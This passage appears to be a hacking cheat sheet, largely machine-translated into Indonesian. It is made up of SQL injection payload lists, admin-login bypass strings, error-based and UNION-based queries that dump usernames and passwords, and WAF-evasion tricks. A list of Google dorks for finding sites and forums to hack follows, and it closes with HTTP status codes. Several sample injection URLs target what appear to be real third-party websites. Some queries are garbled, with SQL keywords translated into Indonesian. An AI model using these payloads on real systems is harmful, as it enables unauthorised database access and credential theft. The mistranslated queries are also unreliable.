  2709. --
  2710. -- -
  2711. --+-
  2712. )--
  2713. )-- -
  2714. )--+-
  2715. ))--
  2716. ))-- -
  2717. ))--+-
  2718. ;%00
  2719. ) ;%00
  2720. ));%00
  2721. %23
  2722. %60
  2723. %90
  2724. and 1=1
  2725. and '1'='1
  2726. and (1)=(1
  2727. php?id=(1) -- -
  2728.  
  2729. string based ::
  2730.  
  2731. '--+-
  2732. ')-- -
  2733. ')--+-
  2734. '))-- -
  2735. '))--+-
  2736. ';%00
  2737. ');%00
  2738. '));%00
  2739. '%23
  2740. '%60
  2741. '%90
  2742. ' and 1=1
  2743. ' and '1'='1
  2744. ' and (1)=(1
  2745. php?id=(1') -- -
  2746.  
  2747. string based double quotes ::
  2748.  
  2749. "-- -
  2750. "--+-
  2751. "%23
  2752. ")-- -
  2753. ")--+-
  2754. "))--+-
  2755. ";%00
  2756. ") ;%00
  2757. "));%00
  2758. "%60
  2759. "%90
  2760. " and 1=1
  2761. " and '1'='1
  2762. " and (1)=(1
  2763. php?id=(1") -- -
  2764.  
  2765. ©
  2766. ~h
  2767.  
  2768. ADMIN LOGIN BRUTE FORCE
  2769.  
  2770. 'or 1=1 limit 1 -- -+
  2771. 'or''='
  2772. ' or '1'='1
  2773. ' or 'x'='x
  2774. ' or 0=0 --
  2775. " or 0=0 --
  2776. or 0=0 --
  2777. ' or 0=0 #
  2778. " or 0=0 #
  2779. or 0=0 #
  2780. ' or 'x'='x
  2781. " or "x"="x
  2782. ') or ('x'='x
  2783. ' or 1=1--
  2784. " or 1=1--
  2785. or 1=1--
  2786. ' or a=a--
  2787. " or "a"="a
  2788. ') or ('a'='a
  2789. ") or ("a"="a
  2790. hi" or "a"="a
  2791. hi" or 1=1 --
  2792. hi' or 1=1 --
  2793. 'or'1=1'
  2794. ==
  2795. and 1=1--
  2796. and 1=1
  2797. ' or 'one'='one--
  2798. ' or 'one'='one
  2799. ' and 'one'='one
  2800. ' and 'one'='one--
  2801. 1') and '1'='1--
  2802. admin' --
  2803. admin' #
  2804. admin'/*
  2805. or 1=1--
  2806. or 1=1#
  2807. or 1=1/*
  2808. ) or '1'='1--
  2809. ) or ('1'='1--
  2810. ' or '1'='1
  2811. ' or 'x'='x
  2812. ' or 0=0 --
  2813. " or 0=0 --
  2814. or 0=0 --
  2815. ' or 0=0 #
  2816. " or 0=0 #
  2817. or 0=0 #
  2818. ' or 'x'='x
  2819. " or "x"="x
  2820. ') or ('x'='x
  2821. ' or 1=1--
  2822. " or 1=1--
  2823. or 1=1--
  2824. ' or a=a--
  2825. " or "a"="a
  2826. ') or ('a'='a
  2827. ") or ("a"="a
  2828. hi" or "a"="a
  2829. hi" or 1=1 --
  2830. hi' or 1=1 --
  2831. 'or'1=1'
  2832.  
  2833. ~h
  2834.  
  2835. [~] information_schema.tables [~]
  2836.  
  2837. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
  2838.  
  2839. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -
  2840.  
  2841. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -
  2842.  
  2843. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -
  2844.  
  2845. /*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
  2846.  
  2847. /*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table
  2848.  
  2849. ~h
  2850.  
  2851. Injeksi Berbasis Kesalahan
  2852. ---------------------
  2853. Injeksi berbasis kesalahan dikerahkan pada database yang didukung oleh MS-SQL.
  2854.  
  2855. Database: MY-SQL: PHP
  2856. MS-SQL: .asp atau .aspx
  2857.  
  2858. Probelm dengan Injeksi Berbasis Kesalahan untuk Peretas
  2859. -----------------------------------------------
  2860. 1. Versi () dan database () tidak berfungsi !!
  2861. Solusi: @@ version
  2862.  
  2863. 2. Anda tidak dapat memanggil semua tabel dari database yang diberikan melalui information_schema.
  2864.  
  2865. 3. Anda tidak dapat mengekstrak kolom dari tabel target Anda dalam satu perjalanan.
  2866.  
  2867. Mengapa dikenal sebagai Injeksi Berbasis Kesalahan
  2868. -----------------------------------------
  2869. Itu berarti Anda akan mendapatkan data dalam kesalahan.
  2870.  
  2871. Target: vulnweb.com: Ini adalah kerangka kerja praktik dari sebuah perusahaan bernama Acunetix.
  2872.  
  2873. Ia memiliki semua praktek serangan teknologi MY-SQL dan MS-SQL.
  2874.  
  2875. Langkah 1: Dapatkan metode GET apa pun di URL situs web. I.e Kita harus mencari SOmethoing = Sesuatu.
  2876. http://testasp.vulnweb.com/showforum.asp?id=0
  2877.  
  2878. Langkah 2: Periksa penanganan pengecualian.
  2879. http://testasp.vulnweb.com/showforum.asp?id=0 '
  2880.  
  2881. Langkah 3: Periksa kondisi yang diperlukan untuk serangan lebih lanjut.
  2882. http://testasp.vulnweb.com/showforum.asp?id=0 dan 1 = 0;
  2883.  
  2884. NOte: Error Based Injection bekerja pada aturan LIFO. Terakhir di First out.
  2885.  
  2886. Sebagai contoh: Jika kita memiliki database dengan tabel seperti berikut
  2887. utas -> 1
  2888. guru-> 2
  2889. kelas-> 3
  2890. biaya-> 4
  2891. pengguna-> 5
  2892.  
  2893. Langkah 4: http://testasp.vulnweb.com/showforum.asp?id=0 dan
  2894. 1 = convert (int, (pilih top 1 table_name dari information_schema.tables));
  2895.  
  2896. Punya Tabel: 'utas' X
  2897. http://testasp.vulnweb.com/showforum.asp?id=0 dan
  2898. 1 = convert (int, (pilih top 1 table_name dari information_schema.tables di mana table_name tidak di ('thread')));
  2899.  
  2900. Target: 'pengguna'
  2901.  
  2902. Langkah 5: Dapatkan kolom masing-masing tabel pengguna
  2903. http://testasp.vulnweb.com/showforum.asp?id=0 dan
  2904. 1 = convert (int, (pilih top 1 column_name dari information_schema.columns di mana table_name = 'users' dan column_name tidak dalam ('uname')));
  2905.  
  2906. Kolom Target: uname, upass
  2907.  
  2908. Langkah 6: Dapatkan yang tidak benar dan upass
  2909. http://testasp.vulnweb.com/showforum.asp?id=0 dan
  2910. 1 = mengkonversi (int, (pilih top 1 upass dari pengguna));
  2911.  
  2912. uname: admin
  2913. upass: tidak ada
  2914.  
  2915.  
  2916.  
  2917. Pengantar Firewall Aplikasi Web dan IDS dan IPS
  2918.  
  2919. www.iamrahultyagi.in officialrahultyagi.in
  2920. -------------------------------------------------- ----------------
  2921. Firewall Aplikasi Web: Ketika pemilik situs web menyebarkan perangkat lunak aplikasi yang berisi semua jenis database serangan di dalamnya dan menyaring permintaan yang digunakan oleh vistor, maka kita dapat mengatakan bahwa aplikasi yang digunakan di situs web adalah firewall aplikasi web.
  2922.  
  2923. Jenis WAF
  2924. ---------------------
  2925. 1. Perangkat Lunak WAF: Ini adalah teknologi firewall yang seperti aplikasi perangkat lunak yang dapat diinstal pada server web dan karenanya dapat digunakan untuk mengisi konten yang diminta.
  2926.  
  2927. Linux: Keamanan Mod: Gratis | Dibayar: .php
  2928. Windows: Dot Defender: Dibayar:. asp aspx
  2929.  
  2930. 2. Hardware WAF: Ini adalah sistem UTM (Unified Threat Management Systems) yaitu berisi Antivirus + Firewall + IDS dan IPS + Web Filteration untuk Konten dll dll.
  2931.  
  2932. Keamanan Mod: Mod Security datang untuk menggambarkan pada awal tahun 2008 ketika peretas berada di puncak dan merusak situs web di seluruh dunia. Ini adalah era ketika ada banyak firewall berbayar tetapi tidak ada solusi untuk organisasi tingkat menengah.
  2933.  
  2934. Mod Security datang dan memberikan sedikit harapan kepada pemilik situs web bahwa mereka akan melindungi dari peretas.
  2935.  
  2936. Masalah
  2937. --------
  2938. 1. Database serangan terbatas.
  2939. 2. Sumber terbuka tetapi kekurangan dana.
  2940.  
  2941. OWASP TOP 10 Serangan yang mereka lakukan terbuka. Panggilan ke Peretas.
  2942.  
  2943. Cara Memasang Keamanan Mod di Ubuntu
  2944. --------------------------------------
  2945. $ sudo apt-get install libapache2-mod-security
  2946. $ sudo a2enmod mod-security
  2947. $ sudo /etc/init.d/apache2 paksa-ulang
  2948.  
  2949. Memahami kerja WAF
  2950. --------------------------------
  2951. Setiap WAF bekerja pada dua format utama pertama Daftar Putih dan filterisasi Daftar Hitam.
  2952.  
  2953. 1. Daftar Putih: Saat kami menyatakan pemilik hanya harus masuk dari suatu IP statis tertentu serta alamat MAC dan nama pengguna dan kata sandi. Oleh karena itu bahkan kata sandi bocor tidak ada yang dapat login situs web kecuali ia tidak berada di IP dan alamat MAC yang sama.
  2954.  
  2955. 2. Black List: Ini adalah cara kedua untuk mengamankan situs web maka ia akan memiliki database dari semua serangan non-sense khususnya string based (order by), (union all select) dll. Dll. Apapun permintaan yang membawa jenis ini string dari VISITOR akan disaring oleh daftar hitam dan sebagai respons akan memblokir jika cocok dengan string apa pun dari daftar.
  2956.  
  2957. Cara Mengonfigurasi Keamanan Mod Anda di Ubuntu Setelah Instalasi
  2958. -------------------------------------------------- --------------
  2959. sudo gedit /etc/apache2/sites-available/000-default.conf
  2960. Setelah membuka file ini yaitu 000-default.conf kita harus mengubah alamat IP dari server atau nama situs web yang lalu lintasnya yang ingin kita saring dari keamanan mod.
  2961.  
  2962. Memintas Validasi WAF dan Filterasi
  2963. ------------------------------------------
  2964.  
  2965. 1. Metode Upper Lower Case
  2966.  
  2967. union all pilih: UnIoN aLl SeLeCt
  2968. http://172.16.191.137/dvwa/vulnerabilities/sqli/?id=1 'UnIoN SeLeCt 1,2 - + & Kirim = Kirim #
  2969.  
  2970. Komentar sebaris: / * * /
  2971.  
  2972. 2. Inline Executable Comments
  2973. / *! UnIoN * / + / *! ALl * / + / *! SeLeCt * /
  2974.  
  2975. Langkah 1: Dapatkan tabel dari database
  2976. http://172.16.191.138/dvwa/vulnerabilities/sqli/?id=1 '/ *! UnIoN * / + / *! aLl * / + / *! SeLeCt * / 1,2 - + & Kirim = Kirim #
  2977.  
  2978. Tabel Target adalah pengguna
  2979.  
  2980. Langkah 2: dapatkan kolom
  2981. http://172.16.191.138/dvwa/vulnerabilities/sqli/?id=1 '/ *! UnIoN * / + / *! aLl * / + / *! SeLeCt * / 1, column_name dari information_schema.columns di mana table_name =' pengguna '- + & Kirim = Kirim #
  2982.  
  2983. Versi Berdasarkan Inline Komentar yang Dapat Dijalankan
  2984. ----------------------------------------
  2985. / *! 50000UnIoN * / + / *! 50000aLl * / + / *! 50000SeLeCt * /
  2986.  
  2987. Langkah 3: http://172.16.191.138/dvwa/vulnerabilities/sqli/?id=1 '/ *! 50000UnIoN * / + / *! 50000aLl * / + / *! 50000SeLeCt * / 1, column_name dari information_schema.columns di mana table_name = 'users' - + & Submit = Kirim #
  2988.  
  2989. NOte: Lakukan hal yang sama dengan semua kata query dan lanjutkan dengan serangan. Jika Anda butuh bantuan, kunjungi www.iamrahultyagi.in atau officialrahultyagi.blogspot.in
  2990.  
  2991. MYSQL
  2992. 5.00.00 -> 50000
  2993. 4,00,00 -> 40000
  2994. 3,00,00 -> 30000
  2995. 2,00,00 -> 20000
  2996. 1,00,00 -> 10.000
  2997.  
  2998. ©
  2999.  
  3000. -rkx
  3001.  
  3002. Penggunaan Kueri Keamanan Tinggi
  3003.  
  3004. 1'order oleh 1 #
  3005. 1 'union pilih 1,2 #
  3006. 1 'union pilih 1, database () #
  3007.  
  3008. atau 1 = 1 union pilih null, table_name dari information_schema.tables
  3009.  
  3010. atau 1 = 1 union pilih null, column_name dari information_schema.columns
  3011.  
  3012. atau 1 = 1 union memilih pengguna, kata sandi dari pengguna
  3013.  
  3014. Error Base Penggunaan query ganda
  3015. Sebuah. Pernyataan Pilih Yang Digunakan Memiliki Jumlah Kolom yang Berbeda.
  3016. b. Kolom Tidak Diketahui 1 atau tidak ada kolom sama sekali (di halaman web dan sumber halaman)
  3017. c. Kesalahan # 1604
  3018.  
  3019. Tampilkan Versi
  3020. atau 1 grup dengan concat_ws (0x3a, versi (), floor (rand (0) * 2)) memiliki min (0) atau 1
  3021.  
  3022. Tampilkan Database
  3023. dan (pilih 1 dari (pilih count (*), concat ((pilih (pilih concat (cast (database () sebagai char), 0x7e)) dari information_schema.tables di mana table_schema = database () limit 0,1), floor ( rand (0) * 2)) x dari grup information_schema.tables dengan x) a)
  3024.  
  3025. Tampilkan tabel
  3026. dan (pilih 1 dari (pilih count (*), concat ((pilih (pilih concat (cast (table_name sebagai char), 0x7e)) dari information_schema.tables di mana table_schema = database () limit 0,1), floor (rand ( 0) * 2)) x dari grup information_schema.tables dengan x) a)
  3027.  
  3028. Tampilkan kolom
  3029. dan (pilih 1 dari (pilih count (*), concat ((pilih (pilih concat (cast (column_name sebagai char), 0x7e)) dari information_schema.columns di mana table_name = 0xTable limit 0,1), floor (rand (0) * 2)) x dari grup information_schema.tables dengan x) a)
  3030.  
  3031.  
  3032. Buang data dari kolom
  3033. dan (pilih 1 dari (pilih count (*), concat ((pilih (pilih concat (cast (concat (COLUMN_NAME, 0x7e, COLUMN_NAME) sebagai char), 0x7e)) dari Databasename.TABLENAME limit 0,1), floor (rand (0) * 2)) x dari grup information_schema.tables dengan x) a)
  3034.  
  3035. -------------------------------------------------- ----------
  3036. -------------------------------------------------- ----------
  3037. http: // localhost / sqli-labs-master / Less-5 /? id = 1'and (pilih 1 dari (pilih count (*), concat ((pilih (pilih concat (cast (column_name sebagai char), 0x7e) ) dari information_schema.columns di mana table_name = 0x7573657273 dan table_schema = database () limit 2,1), floor (rand (0) * 2)) x dari grup information_schema.tables dengan x) a) - +
  3038.  
  3039. Mendapatkan
  3040.  
  3041. http: // localhost / sqli-labs-master / Less-5 /? id = 1'and (pilih 1 dari (pilih count (*), concat ((pilih (pilih concat (cast (concat (nama pengguna, 0x7e, kata sandi ) sebagai char), 0x7e)) dari batas security.users 0,1), floor (rand (0) * 2)) x dari grup information_schema.tables dengan x) a)
  3042. - +
  3043.  
  3044. -------------------------------------------------
  3045. -------------------------------------------------- -
  3046.  
  3047. Basis Kesalahan
  3048. dan (pilih 1 dari (pilih count (*), concat ((pilih (pilih concat (cast (database () sebagai char), 0x7e)) dari information_schema.tables di mana table_schema = database () limit 0,1), floor ( rand (0) * 2)) x dari grup information_schema.tables dengan x) a)
  3049.  
  3050. Error Base Double Query
  3051.  
  3052. Tampilkan Versi
  3053. dan (pilih 1 dari (pilih count (*), concat ((pilih (pilih concat (0x7e, 0x27, cast (versi () sebagai char), 0x27,0x7e)) dari limit information_schema.tables 0,1), floor ( rand (0) * 2)) x dari grup information_schema.tables dengan x) a) dan 1 = 1
  3054.  
  3055. Tampilkan Database
  3056. dan (pilih 1 dari (pilih count (*), concat ((pilih (pilih (PILIH concat yang berbeda (0x7e, 0x27, cast (schema_name sebagai char), 0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) dari information_schema .tables limit 0,1), floor (rand (0) * 2)) x dari grup information_schema.tables dengan x) a) dan 1 = 1
  3057.  
  3058. Tampilkan Tabel dari basis data
  3059. dan (pilih 1 dari (pilih count (*), concat ((pilih (pilih (PILIH concat yang berbeda (0x7e, 0x27, cast (table_name sebagai char), 0x27,0x7e) FROM information_schema.tables Dimana table_schema = 0xDatabase_Name LIMIT 0,1 )) dari batas information_schema.tables 0,1), floor (rand (0) * 2)) x dari grup information_schema.tables dengan x) a) dan 1 = 1
  3060.  
  3061. Tampilkan Kolom dari tabel
  3062. dan (pilih 1 dari (pilih count (*), concat ((pilih (pilih (PILIH concat yang berbeda (0x7e, 0x27, cast (column_name sebagai char), 0x27,0x7e) FROM information_schema.columns Di mana table_schema = 0xDatabase_name DAN table_name = 0xTable_name LIMIT 0,1)) dari batas information_schema.tables 0,1), floor (rand (0) * 2)) x dari grup information_schema.tables dengan x) a) dan 1 = 1
  3063.  
  3064. Dump Data dari kolom
  3065. dan (pilih 1 dari (pilih count (*), concat ((pilih (pilih (pilih concat (0x7e, 0x27, cast (table_name.column_name sebagai char), 0x27,0x7e) DARI `security`.table_name LIMIT 0,1) ) dari batas information_schema.tables 0,1), floor (rand (0) * 2)) x dari grup information_schema.tables dengan x) a) dan 1 = 1
  3066. -------------------------------------------------- ------
  3067.  
  3068. Dump in one Shot (Database, Tabel, Kolom)
  3069. (pilih (@x) dari (pilih (@x: = 0x00), (pilih (0) dari (information_schema.columns) di mana (table_schema! = 0x696e666f726d6174696f6e5f736368656d61) dan (0x00) dalam (@x: = / *! 50000concat * / (@ x, 0x3c62723e, table_schema, 0x272d2d3e27, table_name, 0x272d2d3e27, column_name)))) x)
  3070.  
  3071. (pilih (@) dari (pilih (@: = 0x00), (pilih (@) dari tbl_admin_info di mana (@) dalam (@: = / *! 50000concat * / (@, user_name, 0x3a, kata sandi)))) a )
  3072. -------------------------------------------------- ----
  3073.  
  3074. jika concat block gunakan ganti fungsi
  3075.  
  3076. ganti (REPLACE (ganti (0x5b215d, 0x5b, versi ()), 0x21, database ()), 0x5d, usâ € ‹er ())
  3077.  
  3078. Function ByPassing
  3079.  
  3080. * unhex(hex(value))
  3081.  
  3082. * cast(value as char)
  3083.  
  3084. * uncompress(compress(version()))
  3085.  
  3086. * cast(version() as char)
  3087.  
  3088. * aes_decrypt(aes_encrypt(version(),1),1)
  3089.  
  3090. * binary(version())
  3091.  
  3092. * convert(value using ascii)
  3093.  
  3094. Mengapa Kami menggunakan 50000,12345,00000 dalam / *! * /?
  3095.  
  3096. Frnds Sekarang saya ingin berbagi sesuatu yang menarik 4u yang merupakan bagian dari SQLI. Hanya 4 pemula.
  3097. Master bros sudah tahu ini yang harus saya bagikan di sini
  3098.  
  3099. Topik: Mengapa kami menggunakan 50000,00000,12345 dalam / *! * /?
  3100.  
  3101. Pendatang baru saya menggunakan semua / *! 12345 * / seperti dat 4 yang melewati WAF. Apakah Anda tahu logika di balik ini mengapa kita menggunakan 12345? Hari ini m memberitahu Anda arti sebenarnya dari ini Tapi pertama setelah membaca komentar ini yang Anda ketahui sebelum arti dari penggunaan dat 12345.00000,50000
  3102.  
  3103. Jadi, sekarang dengarkan baik-baik
  3104.  
  3105. Sebenarnya kita menggunakan 12345 bcuj ketika kita menulis ini menjalankan versi MySQL upto 5. Berarti jika versi mysql Anda adalah upto 5 maka Anda dapat menggunakan 00000,12345,50000 atau bahkan Anda dapat menggunakan 56000 tetapi jika versi mysql adalah 5,6 sesuatu. Jadi itu berarti nomor 12345 terkait dengan versi mysql
  3106.  
  3107. 12345 berarti => 1.23.4500000 berarti => 0.00.0050000 berarti => 5.00.0056000 berarti => 5.60.00
  3108.  
  3109. Baca saja semuanya karena jika Anda tidak melakukannya, Anda tidak akan mengerti ini
  3110. kode dan bagaimana cara kerjanya!
  3111.  
  3112. Dorks:
  3113.  
  3114. inurl: "view.asp? page =" intext: "plymouth"
  3115.  
  3116. Ok apa kode ini?
  3117. Jadi ini adalah sekolah-sekolah universitas yang dapat diretas dengan sekolah-sekolah universitas dork ini.
  3118.  
  3119. inurl: "shoutbox.php" intext: "skrip"
  3120.  
  3121. dengan kode ini Anda dapat meretas shoutbox atau menemukan skrip
  3122.  
  3123.  
  3124. inurl: "index.php? act =" rapidleech
  3125.  
  3126. Kode ini akan menemukan situs rapidleecher dengan sangat cepat.
  3127.  
  3128. inurl: "index.php? act = idx"
  3129.  
  3130. Kode ini akan menemukan forum ipb dengan cepat untuk diretas
  3131.  
  3132. inurl: "Photoshop.aspx" "tutorial"
  3133.  
  3134. Kode ini akan menemukan tutorial photoshop
  3135.  
  3136. inurl: ftp: // situs ftp: .com
  3137.  
  3138. Kode ini akan menemukan server ftp apa saja dan membasmi situs yang dilindungi.
  3139.  
  3140. allinurl: user_index.jsp
  3141.  
  3142. Kode ini akan menemukan hosting gratis apa pun
  3143.  
  3144. didukung oleh vbulletin game 3.8.4 inurl: member.php? u = 1
  3145.  
  3146. Kode ini akan menemukan forum permainan vbulletin dan halaman admin.
  3147.  
  3148. didukung oleh vbulletin 4.0.3 Informasi Debug
  3149.  
  3150. Kode ini akan menampilkan semua kode dan informasi kode vbulletin forum
  3151. dan bugnya Anda rooting ke dalamnya.
  3152.  
  3153. didukung oleh vbulletin "warez"
  3154.  
  3155. Kode ini akan menemukan forum warez apa pun.
  3156.  
  3157. video ke mp3 konverter intext online: "mp3" -intis: "Kualitas Tinggi"
  3158.  
  3159. Dengan kode ini Anda dapat mengunduh mp3 dari youtube dengan sangat cepat.
  3160.  
  3161. intext: "Peringatan: mysql_fetch_array ()"
  3162.  
  3163. Dengan kode ini Anda akan menemukan situs vulnarable dan meretasnya.
  3164.  
  3165. inurl: radioandtv.php
  3166.  
  3167. Kode ini akan menampilkan semua torrent stasiun radio tersembunyi.
  3168.  
  3169. inurl: "postingan.php? mode = smilies" "phpbb"
  3170.  
  3171. Dengan kode ini Anda akan dapat meretas forum phpbb dan memasukkan xss ke dalam forum.
  3172.  
  3173. allinurl: alat / spider-view.php
  3174.  
  3175. Dengan kode ini Anda dapat menemukan tautan situs dengan sangat cepat.
  3176.  
  3177. embed src = ". mp3" type = audio / mpeg
  3178.  
  3179. Kode injeksi Html untuk menemukan situs rahasia dengan kode html mp3 embed
  3180. Anda akan melihatnya bahkan di google.
  3181.  
  3182. "didukung oleh vbulletin" + "akun dump"
  3183.  
  3184. Dengan kode ini Anda akan dapat menemukan kata sandi
  3185. untuk situs apa pun, forum bukan untuk pornografi.
  3186.  
  3187. allinurl: "buku tamu / smileys.php"
  3188. inurl: "smileys.php" + "berbicara"
  3189. allinurl: smiliehelp.php
  3190.  
  3191. Berbicara smilies.
  3192.  
  3193. "intitle: index of" admin / FCKeditor / _samples / html
  3194.  
  3195. Dengan kode ini Anda akan dapat menemukan fck server html
  3196. editor dan meretasnya.
  3197.  
  3198. burung hantu kota kunang-kunang + "instrumental"
  3199.  
  3200. Dengan kode ini Anda akan dapat mp3 instrumental dan mengubah ini
  3201. burung hantu kota kunang-kunang
  3202.  
  3203. HTTP / 1.1 :: Mozilla / 5.0 (Windows; U; Windows NT 5.1; en-US; rv: 1.9.2.3)
  3204. access_log
  3205.  
  3206. dengan kode ini Anda akan dapat meretas akses situs
  3207. log dan lihat semua informasi.
  3208.  
  3209. "google scanner sql" + "php"
  3210.  
  3211. Google sql injection online meretas situs-situs rentan, forum
  3212. dan menemukan situs-situs yang rentan sangat mudah.
  3213.  
  3214. situs: youtube.com *@gmail.com
  3215.  
  3216. Ini akan menemukan youtube atau email situs apa pun.
  3217.  
  3218. allinurl: html_colors.html
  3219.  
  3220. Ini akan menemukan kode grafik html sangat cepat.
  3221.  
  3222. torrent pribadi + "buka daftar"
  3223.  
  3224. Ini akan menemukan torrent pribadi yang terbuka untuk didaftarkan.
  3225.  
  3226.  
  3227. hotfile + mediafire + "http: //" + "rar" horor 2010 dvdrip,
  3228. (hotfile | mediafire) .rar 2010 horor dvdrip
  3229.  
  3230. Ini akan menemukan situs-situs rahasia dengan film dvdrip hanya mengubah horor.
  3231.  
  3232. dvdrip 400mb "2010"
  3233.  
  3234. Ini akan menemukan film ripping dvdrip dalam 400mb dan terbaru.
  3235.  
  3236. sql dork bank injeksi
  3237.  
  3238. Ini akan menemukan bank dorks untuk meretas google.
  3239.  
  3240. inurl: archive / index.php "visual basic"
  3241.  
  3242. -4LPH4
  3243.  
  3244. POST METHOD
  3245.  
  3246. ------------
  3247.  
  3248. http://mosii.gametrailers.com/getmediainfo4.php?mid=47330 and false UNION SELECT 1,@@version,333,4444,5,6,7,8,0,10,11,12,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
  3249.  
  3250. http://sharemobile.ro/index.php
  3251.  
  3252. &login=login&password=xxxxxxxxxx&username=asdasdasd' and false union select 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 %23
  3253.  
  3254. http://www.articlemarketingrobot.com/db/select.php
  3255.  
  3256. sql=select/**/*/**/from/**/_articlequeue/**/where/**/1=2/**/and/**/1=2/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11/**/%23&dbid=a6b65df1-14b4-47a0-98f7-c7e420deda3f&cb=ZZCZXV36
  3257.  
  3258.  
  3259. ~h
  3260.  
  3261. -----------------------------------------------
  3262. UNION SELECT BASED
  3263.  
  3264. -------------------------------------------------------------------------
  3265.  
  3266. http://127.0.0.1/defcamp/0_o/index.php?id=2%27+and+1=0+union+select+1,2,3,4,5,(SELECT-!!-1||! !N'1'|2),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--
  3267.  
  3268. http://www.communityinclusion.org/staff.php?staff_id=1+and+1=2+UNION+SELECT+1,2,3,4,5,6;%00
  3269.  
  3270. http://poze.exn.ro/poze.php?id=202&poze=vedete"+and+false+union+all+select+1,2,version(),4,5,6+and+"1"="1
  3271.  
  3272. test.ru/test.php?id=-40+union+select+1,(select(@x)from(select(@x:=0x00),(select(0)from(members)where(0x00)in(@x:=concat(@x,0x3c62723e,mail,0x3a,pwd))))x),3,4,5,6,7,8,9--+
  3273.  
  3274. http://www.marinaplast.com/page.php?id=13 div 0 union select 1,2,3,4,5
  3275.  
  3276. mysite.com/index.php?id=-1+UNION+SELECT+1,convert(@@version using latin1),3,4,5--
  3277.  
  3278. mysite.com/index.php?id=-1+union+select+1,group_concat(table_name),3+from+information_schema.tables+--+
  3279.  
  3280. mysite.com/index.php?id=-1+union+select+1,group_concat(table_name),3+from+information_schema.tables+where+table_name>'mytable'+--+
  3281.  
  3282. mysite.com/index.php?id=-1+union+select+1,group_concat(table_name),3+from+information_schema.tables+where+table_name>0x6d797461626c65+--+
  3283.  
  3284. mysite.com/index.php?id=-1+union+select+1,group_concat(username,0x3a,password),3,4,5+from+0x6578616d706c656462322e61646d696e6973747261746f7273--
  3285.  
  3286. mysite.com/index.php?id=-1'+union+select+concat(name,0x3a,password)+from+user+where+id=1+--+
  3287.  
  3288. mysite.com/index.php?id=9086 UNION /*!SELECt*/ 1,2,grouP_ConCat(column_name),4,5,6,7,8 from /*!information_schema*/.columns where table_schema=database()--
  3289.  
  3290. mysite.com/index.php?catid=-1 UNION SELECT 1,concat(table_name,CHAR(58),column_name,CHAR(58),table_schema) from information_schema.columns where column_name like CHAR(37, 112, 97, 115, 37),3,4--
  3291.  
  3292. mysite.com/index.php?catid=1 union select 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version())--
  3293.  
  3294. mysite.com/index.php?a=newsdetail&id=-1+union+select+1,2,3,4,5,6,7,8+from+information_schema.tables+where+table_schema=database()
  3295.  
  3296. mysite.com/index.php?a=newsdetail&id=-1+union+select+1,2,3,4,5,6,7,8+from+information_schema.tables+where+table_schema=database()
  3297.  
  3298. mysite.com/index.php?a=newsdetail&id=-1+union+select+1,group_concat(table_name),3,4,5,6,7,8+from+information_schema.tables+where+table_schema=database()
  3299.  
  3300. mysite.com/index.php?a=newsdetail&id=-1+union+select+1,group_concat(table_name),3,4,5,6,7,8+from+information_schema.tables+where+table_schema=database()
  3301.  
  3302. mysite.com/index.php?a=newsdetail&id=-1/*!AND*/1=1+UNiOn+ALl+SelECt+1,/**/2,/**/3,/**/4,/**/5,/**/6,/**/7,/**/8,/**/9/**/limit/**/1,2
  3303.  
  3304. +and+1=0+union+select+ sql_no_cache +1,2,3,4,5
  3305.  
  3306. http://www.microage-bathurst.ca/services.php?id=-7+union+select+1,hex(group_concat(table_name)),3,4+from+information_schema.tables+where+table_rows>0--
  3307.  
  3308. http://www.imsports.msu.edu/clubs/clubDisp.php?id=-71+union+select+1,GROUP_CONCAT(concat_ws(0x3a,table_schema,TABLE_NAME)+SEPARATOR+0x3C62723E),3,4,5,6,7,8,9,10,11+from+information_schema.columns+where+column_name+like+0x257061737325+or+column_name+like+0x25702577256425--+
  3309.  
  3310. http://web.riss.ru/cgi-bin/riss.cgi?action=news_show&lang=concat_ws(0x3a,user(),database(),version())+FROM+riss_news+LIMIT+1--+&id=-1+union+select+1,2,3
  3311.  
  3312. http://www.wbdg.org/ccb/browse_org.php?o=70+and+1=10+union+select+111111111113371111111111,2--
  3313.  
  3314. concat(@i:=0x00,@o:=0xd0a,benchmark(61,@o:=CONCAT(@o,0xd0a,(SELECT+concat(table_schema,0x2E,@i:=table_name)+FROM+information_schema.tables+WHERE+table_name>@i+order+by+table_name+LIMIT+1))),@o)
  3315.  
  3316. ~Ph.h4rh4r
  3317.  
  3318. List of HTTP status codes
  3319.  
  3320. 400 ===> (Bad request)
  3321. 401 ===> (Authorization required)
  3322. 402 ===> (Payment required)
  3323. 403 ===> (Forbidden)
  3324. 404 ===> (Not found)
  3325. 405 ===> (Method not allowed)
  3326. 406 ===> (Not acceptable)
  3327. 407 ===> (Proxy authentication required)
  3328. 408 ===> (Request timeout)
  3329. 409 ===> (Conflict)
  3330. 410 ===> (Gone)
  3331. 411 ===> (Length required)
  3332. 412 ===> (Precondition failed)
  3333. 413 ===> (Request entity too large)
  3334. 414 ===> (Request URI too large)
  3335. 415 ===> (Unsupported media type)
  3336. 416 ===> (Request range not satisfiable)
  3337. 417 ===> (Expectation failed)
  3338. 422 ===> (Unprocessable entity)
  3339. 423 ===> (Locked)
  3340. 424 ===> (Failed dependency)
  3341. 500 ===> (Internal server error)
  3342. 501 ===> (Not Implemented)
  3343. 502 ===> (Bad gateway)
  3344. 503 ===> (Service unavailable)
  3345. 504 ===> (Gateway timeout)
  3346. 505 ===> (HTTP version not supported)
  3347. 506 ===> (Variant also negotiates)
  3348. 507 ===> (Insufficient storage)
